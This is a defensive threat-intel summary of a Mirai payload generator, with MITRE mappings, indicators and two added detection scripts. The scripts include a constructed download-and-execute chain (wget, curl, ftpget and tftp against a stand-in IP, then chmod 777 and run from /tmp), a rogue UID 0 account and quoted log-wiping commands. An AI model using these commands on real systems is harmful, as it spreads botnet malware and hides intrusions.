A detailed look at a Mirai payload generator shows how a Linux host is turned into a staging server that delivers Mirai payloads for multiple CPU architectures over HTTP, FTP and TFTP. The post also describes the backdoor the script leaves behind (a second root-level account) and the multi-architecture download/execute chains it generates for the Mirai payloads. #Mirai #Yakuza #BigBots #iplogger #pastebin
Keypoints
- The Mirai botnet historically targeted Linux-based devices such as camera recorders and remains active, with hundreds of Mirai requests hitting honeypots daily.
- A Python script (SHA256: f56391e9645df1058847e28af6918c64ddc344d9f328b3dde9015213d5efdc7e) generates the Mirai download/execute chains and deploys network services (FTP, HTTP, TFTP) on the host to store and distribute the payloads.
- The script retrieves the host's public IP via api.ipify.org, then defines one payload binary per architecture (e.g., x86.yakuza, mips.yakuza, arm4.yakuza).
- It uses yum to install and start dependencies (httpd, xinetd, tftp, vsftpd) and configures TFTP/FTP services to serve payloads.
- A backdoor is created by adding a second root-level account (bigbots) so the attacker keeps SSH access to the staging host.
- The generated delivery chains try several fetch methods (wget, curl, ftpget, tftp) and several drop directories before executing the downloaded payload.
- Indicators point to related sources (Malpedia, the SANS ISC diary, Abuse.ch, Pastebin) for Mirai research and sample data.
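The download/execute chains and their base64 wrapper are the part of the script a defender most often meets on a honeypot, so here is an added parser for them. This is example code written for this summary, not code from the diary or from the generator itself; the sample chain, the staging host 203.0.113.10 and the "bins" directory are constructed values chosen to match the shape described above (wget, curl, ftpget and tftp fallbacks against one host, a chmod, then execution from /tmp).

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Constructed sample, not from the diary: one per-architecture chain in the
# shape the generator builds. Host and directory names are made up.
SAMPLE_CHAIN = (
    "cd /tmp; wget http://203.0.113.10/bins/x86.yakuza; "
    "curl -O http://203.0.113.10/bins/x86.yakuza; "
    "ftpget -v -u anonymous -p anonymous -P 21 203.0.113.10 x86.yakuza x86.yakuza; "
    "tftp -g -r x86.yakuza 203.0.113.10; "
    "chmod 777 x86.yakuza; ./x86.yakuza; rm -rf x86.yakuza"
)

# The same chain base64-encoded, mirroring the "encoded = ..." string in the script.
SAMPLE_ENCODED = base64.b64encode(SAMPLE_CHAIN.encode()).decode()

FETCH_TOOLS = ("wget", "curl", "ftpget", "tftp")
URL_RE = re.compile(r"https?://[^\s;'\"]+")
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def decode_if_base64(blob: str) -> str:
    """Return the decoded command if blob is base64 of printable text, else blob.

    The generator does str(base64.b64decode(...)); under Python 3 that yields a
    literal "b'...'" wrapper, so the bytes are .decode()d here instead.
    """
    try:
        text = base64.b64decode(blob, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return blob
    if all(ch.isprintable() or ch in "\n\t" for ch in text):
        return text
    return blob


def analyse_chain(cmd: str) -> dict:
    """Extract staging hosts, fetch tools, dropped binaries and drop dirs from a chain."""
    text = decode_if_base64(cmd.strip())
    segments = [s.strip() for s in text.split(";") if s.strip()]
    hosts, tools, binaries, drop_dirs, executed = set(), [], set(), [], []
    for seg in segments:
        argv = seg.split()
        tool = argv[0]
        if tool == "cd" and len(argv) > 1:
            drop_dirs.append(argv[1])
        elif tool in FETCH_TOOLS:
            tools.append(tool)
            for url in URL_RE.findall(seg):            # wget / curl carry a URL
                parsed = urlparse(url)
                hosts.add(parsed.hostname)
                binaries.add(parsed.path.rsplit("/", 1)[-1])
            for tok in argv[1:]:                        # ftpget / tftp name host and file bare
                if IPV4_RE.fullmatch(tok):
                    hosts.add(tok)
                elif "." in tok and not tok.startswith("-") and "://" not in tok:
                    binaries.add(tok)
        elif tool.startswith("./"):
            executed.append(tool[2:])
    return {
        "hosts": sorted(hosts),
        "tools": tools,
        "binaries": sorted(binaries),
        # Binary names are <arch>.<family>, so the first label is the target CPU.
        "architectures": sorted({b.split(".", 1)[0] for b in binaries}),
        "drop_dirs": drop_dirs,
        "executed": executed,
    }


def looks_like_mirai_loader(report: dict) -> bool:
    """Heuristic: world-writable drop dir, at least two fetch fallbacks, fetched file is run."""
    writable = any(d.startswith(("/tmp", "/var", "/dev")) for d in report["drop_dirs"])
    fallbacks = len(set(report["tools"])) >= 2
    runs_download = bool(set(report["executed"]) & set(report["binaries"]))
    return writable and fallbacks and runs_download


if __name__ == "__main__":
    import json
    print(json.dumps(analyse_chain(SAMPLE_ENCODED), indent=2))
```

Feed it the raw command string captured by a honeypot (plain or base64) and the report gives the staging IP to block, the binary names to hunt for, and the architectures the actor is targeting; the heuristic is deliberately loose, since the page's own point is that the fetch-tool fallbacks and the /tmp drop are what every variant has in common.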
MITRE Techniques
- [T1105] Ingress Tool Transfer – The payloads are fetched from the staging host with wget, curl, ftpget and tftp; the generator builds the command string as "wget http://' + ip + '/' + bin_directory + '/' + bin_prefix + i + '; curl -O http://' + ip + '/' + bin_directory + '/' + bin_prefix + i"
- [T1569.002] Service Execution – The attacker installs and starts web/file services (httpd, xinetd, tftp, vsftpd) to host and distribute payloads, e.g. “yum install httpd -y … service httpd start”
- [T1136.001] Create Account – A rogue root account (bigbots) is added to gain persistence and SSH access, e.g. “The host is now reachable via SSH with the rogue user ‘bigbots’.”
- [T1027] Obfuscated Files or Information – The download/execute chain is stored base64-encoded and decoded at runtime, e.g. "encoded = 'Y2QgL3RtcDsgd2d…'; exploit = str(base64.b64decode(encoded))" (the visible prefix decodes to "cd /tmp; wg…")
- [T1059.004] Command and Scripting Interpreter: Unix Shell, and [T1059.006] Python – Shell commands driven from Python perform installation and execution, e.g. "def run(cmd): subprocess.call(cmd, shell=True)" and "yum install httpd -y"
- [T1070.004] Indicator Removal: File Deletion – The script wipes login and shell-history traces on the staging host with "rm -rf /var/log/lastlog", "history -c" and "clear" (clearing the shell history is also T1070.003, Clear Command History)
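The persistence mechanism above (a second account with UID 0) is cheap to check for from /etc/passwd alone, so here is an added audit routine. This is example code written for this summary, not the diary's or the script's code; the passwd excerpt is constructed, and the account name bigbots is the one the summary reports.

```python
from collections import defaultdict

# Constructed /etc/passwd excerpt (not from the diary): a stock root user plus a
# second UID 0 account named like the one the generator adds.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
bigbots:x:0:0::/home/bigbots:/bin/bash
"""

# Shells that cannot be used for an interactive SSH login.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}


def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines into dicts; blank and comment lines are skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries


def find_rogue_root_accounts(text: str) -> list:
    """Flag non-root accounts that hold UID 0, GID 0, or share a UID with another user."""
    entries = parse_passwd(text)
    names_by_uid = defaultdict(list)
    for e in entries:
        names_by_uid[e["uid"]].append(e["name"])

    findings = []
    for e in entries:
        if e["name"] == "root":          # the legitimate superuser is expected
            continue
        reasons = []
        if e["uid"] == 0:
            reasons.append("uid 0 (alternate root account)")
        if e["gid"] == 0:
            reasons.append("primary group 0 (root)")
        others = [n for n in names_by_uid[e["uid"]] if n != e["name"]]
        if others and e["uid"] != 0:     # uid 0 already reported above
            reasons.append("shares uid %d with %s" % (e["uid"], ", ".join(others)))
        if reasons:
            findings.append({
                "name": e["name"],
                "uid": e["uid"],
                "shell": e["shell"],
                # Interactive shell + UID 0 is exactly the SSH backdoor described above.
                "ssh_capable": e["shell"] not in NOLOGIN_SHELLS,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in find_rogue_root_accounts(SAMPLE_PASSWD):
        print(f["name"], f["uid"], f["shell"], "; ".join(f["reasons"]))
```

Run it against the real file with `find_rogue_root_accounts(open("/etc/passwd").read())`; anything it returns with `ssh_capable` set deserves a look at `authorized_keys` and the sshd logs, which is where the lastlog wipe in the T1070.004 entry above is meant to blind you.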
Indicators of Compromise
- [Hash] SHA256 of the Python generator script – f56391e9645df1058847e28af6918c64ddc344d9f328b3dde9015213d5efdc7e
- [Domain] contacted or referenced by the script – api.ipify.org (public IP lookup), iplogger.com, pastebin.com; malpedia.caad.fkie.fraunhofer.de/details/elf.mirai is a research reference, not infrastructure
- [File name] – tyakuza.sh, yakuza1.sh, yakuza2.sh
- [File name] – /bin/busybox (copied to /tmp/)
Read more: https://isc.sans.edu/diary/Overview+of+a+Mirai+Payload+Generator/29624/